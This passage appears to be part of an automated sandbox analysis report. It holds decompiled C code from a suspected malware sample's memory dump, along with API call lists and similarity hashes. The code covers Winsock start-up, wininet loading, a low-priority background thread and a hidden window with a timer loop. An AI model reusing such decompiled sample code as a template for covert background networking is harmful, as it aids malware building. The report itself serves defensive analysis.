					if(_t63 != 1) {
						goto L14;
					}
					_t65 = _t76 - 0x254;
					_push(_t65);
					_push(0x101);
					L001D1454();
					if(_t65 != 0) {
						goto L14;
					}
					 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
				}
				_t75 = LocalAlloc(0x40, 0x4464);
				if(_t75 != 0) {
					 *(_t75 + 0x6c) = 1;
					 *(_t75 + 0x70) =  *(_t75 + 0x70) | 0xffffffff;
					 *(_t75 + 0x5c) =  *(_t75 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t75 + 0x3ba8)) = GetCurrentThreadId();
					_t23 = _t75 + 0x3c58; // 0x3c58
					E001D3834(_t23, _t76 - 0xa8, 0x80);
					 *(_t75 + 0x6c) = 3;
					_t54 = CreateThread(0, 0, E001D3722, _t75, 0, _t76 - 0x28);
					_t26 = _t75 + 0x3ba4; // 0x3ba4
					_t71 = _t26;
					 *_t71 = _t54;
					if(_t54 != 0) {
						 *(_t76 - 0x24) = 1;
						 *((intOrPtr*)(_t76 - 0x74)) = 0;
						SetThreadPriority( *_t71, 0xfffffff1);
					}
				}
				E001D1ABC(_t75,  *(_t76 - 0x24));
				if( *(_t76 - 0x24) != 0) {
					goto L1;
				} else {
					goto L14;
				}
			}











0x001d2648
0x001d264d
0x001d2652
0x001d2659
0x001d266a
0x001d266f
0x001d2676
0x001d2676
0x001d2676
0x001d2679
0x001d267f
0x001d2680
0x00000000
0x00000000
0x001d2682
0x001d2683
0x001d26ad
0x001d26b5
0x001d26cb
0x001d277b
0x001d2782
0x001d2787
0x001d278c
0x001d278f
0x001d2792
0x001d2797
0x001d2797
0x001d27c6
0x001d27c6
0x001d26e6
0x00000000
0x00000000
0x00000000
0x001d26e8
0x001d2685
0x001d2686
0x00000000
0x00000000
0x001d2689
0x00000000
0x00000000
0x001d268f
0x001d2695
0x001d2696
0x001d269b
0x001d26a2
0x00000000
0x00000000
0x001d26a8
0x001d26a8
0x001d26fa
0x001d26fe
0x001d2700
0x001d2707
0x001d270b
0x001d2715
0x001d2723
0x001d272a
0x001d272f
0x001d2743
0x001d2749
0x001d2749
0x001d274f
0x001d2753
0x001d2755
0x001d275c
0x001d2763
0x001d2763
0x001d2753
0x001d276d
0x001d2775
0x00000000
0x00000000
0x00000000
0x00000000

APIs
  • WSAStartup.WSOCK32(00000101,?,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D269B
    • Part of subcall function 001D2CC7: LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
    • Part of subcall function 001D2CC7: GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
    • Part of subcall function 001D2CC7: FreeLibrary.KERNEL32(?), ref: 001D2D3F
    • Part of subcall function 001D2CC7: inet_ntoa.WSOCK32(?), ref: 001D2D5E
    • Part of subcall function 001D2CC7: wsprintfA.USER32 ref: 001D2DBF
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 001D26DE
  • LocalAlloc.KERNEL32(00000040,00004464,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D26F4
  • GetCurrentThreadId.KERNEL32 ref: 001D270F
  • CreateThread.KERNEL32(00000000,00000000,001D3722,00000000,00000000,?), ref: 001D2743
  • SetThreadPriority.KERNEL32(00003BA4,000000F1), ref: 001D2763
    • Part of subcall function 001D1ABC: WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
    • Part of subcall function 001D1ABC: TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
    • Part of subcall function 001D1ABC: CloseHandle.KERNEL32(?), ref: 001D1B0E
    • Part of subcall function 001D1ABC: LocalFree.KERNEL32(?,?), ref: 001D1B15
    • Part of subcall function 001D15A3: FreeLibrary.KERNEL32(00000000), ref: 001D15D1
  • WSACleanup.WSOCK32(?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D2792
  • PostMessageA.USER32(00000400,00000001,00000002), ref: 001D27BB
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject
  • String ID:
  • API String ID: 4003875101-0
  • Opcode ID: 04216faaea4ba07e98bcd26563bf42db8e4c0576a096f68bb43e63f5af89c022
  • Instruction ID: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
  • Opcode Fuzzy Hash: D9E08C43914E1AD0C8A7FDC0082E7061E61B76D1E2E5EC5053282436417F1EE0089F89
  • Instruction Fuzzy Hash: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
C-Code - Quality: 100%
			E001D19F3(intOrPtr _a4) {
				signed char _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed char* _t24;
				void** _t27;
				intOrPtr _t29;
				void* _t30;
				struct _CRITICAL_SECTION* _t32;

				_t29 = _a4;
				_t24 = _t29 + 0x1b44;
				_t11 =  *_t24;
				if((_t11 & 0x00000001) != 0) {
					_t32 = _t29 + 0x1b18;
					 *_t24 = _t11 & 0x000000fe;
					EnterCriticalSection(_t32);
					_t13 =  *(_t29 + 0x1b40);
					if(_t13 != 0) {
						SetEvent(_t13);
					}
					_t14 =  *(_t29 + 0x1b10);
					if(_t14 != 0) {
						SetEvent(_t14);
					}
					_t27 = _t29 + 0x1b0c;
					_t15 =  *_t27;
					if(_t15 != 0) {
						WaitForSingleObject(_t15, 0x7d0);
						CloseHandle( *_t27);
						 *_t27 =  *_t27 & 0x00000000;
					}
					_t16 =  *(_t29 + 0x1b40);
					if(_t16 != 0) {
						_t16 = CloseHandle(_t16);
					}
					_t30 =  *(_t29 + 0x1b10);
					if(_t30 != 0) {
						_t16 = CloseHandle(_t30);
					}
					DeleteCriticalSection(_t32);
					return _t16;
				}
				return _t11;
			}













0x001d19f4
0x001d19f8
0x001d19fe
0x001d1a02
0x001d1a09
0x001d1a10
0x001d1a12
0x001d1a18
0x001d1a26
0x001d1a29
0x001d1a29
0x001d1a2b
0x001d1a33
0x001d1a36
0x001d1a36
0x001d1a3e
0x001d1a44
0x001d1a48
0x001d1a50
0x001d1a58
0x001d1a5a
0x001d1a5a
0x001d1a5d
0x001d1a65
0x001d1a68
0x001d1a68
0x001d1a6a
0x001d1a72
0x001d1a75
0x001d1a75
0x001d1a78
0x00000000
0x001d1a80
0x001d1a82

APIs
  • EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
  • SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
  • SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
  • WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
  • CloseHandle.KERNEL32(?), ref: 001D1A58
  • CloseHandle.KERNEL32(?), ref: 001D1A68
  • CloseHandle.KERNEL32(?), ref: 001D1A75
  • DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage
  • String ID:
  • API String ID: 1289143423-0
  • Opcode ID: a48adf90a0f1ca95f9f8ccd3f9eb1397de436c8d144647db204e4c52001b9e96
  • Instruction ID: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
  • Opcode Fuzzy Hash: ABE0D843065850B3DC4B75752C0C31787917BC9ECAC9C67093056F4248CB87A61CEF43
  • Instruction Fuzzy Hash: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
C-Code - Quality: 81%
			E001D2C05(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x1d13f0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x1d5044; // 0x1d0000
				 *0x001D50DC = _t11;
				_t30 = _t35 - 0x138;
				 *0x001D50F0 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x1d50cc);
				 *0x1d50c0 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				_t15 =  *0x1d506c; // 0x0
				asm("sbb eax, eax");
				SetTimer( *0x1d50c0, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x1d50c0 = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E001D173E(0);
			}







0x001d2c05
0x001d2c0a
0x001d2c0f
0x001d2c16
0x001d2c21
0x001d2c26
0x001d2c36
0x001d2c3c
0x001d2c49
0x001d2c4f
0x001d2c5b
0x001d2c61
0x001d2c68
0x001d2c7d
0x001d2c83
0x001d2c98
0x001d2ca2
0x001d2ca2
0x001d2caa
0x001d2cb9
0x001d2cc4

APIs
  • GetModuleFileNameA.KERNEL32(001D0000,?,00000103,001D50CC,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,001D0000,00000000), ref: 001D2C49
  • RegisterClassA.USER32 ref: 001D2C4F
  • CreateWindowExA.USER32 ref: 001D2C55
  • SetTimer.USER32(00000064,-0000EA60,00000000), ref: 001D2C7D
  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D2C8A
  • TranslateMessage.USER32(?), ref: 001D2C98
  • DispatchMessageA.USER32(?), ref: 001D2CA2
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp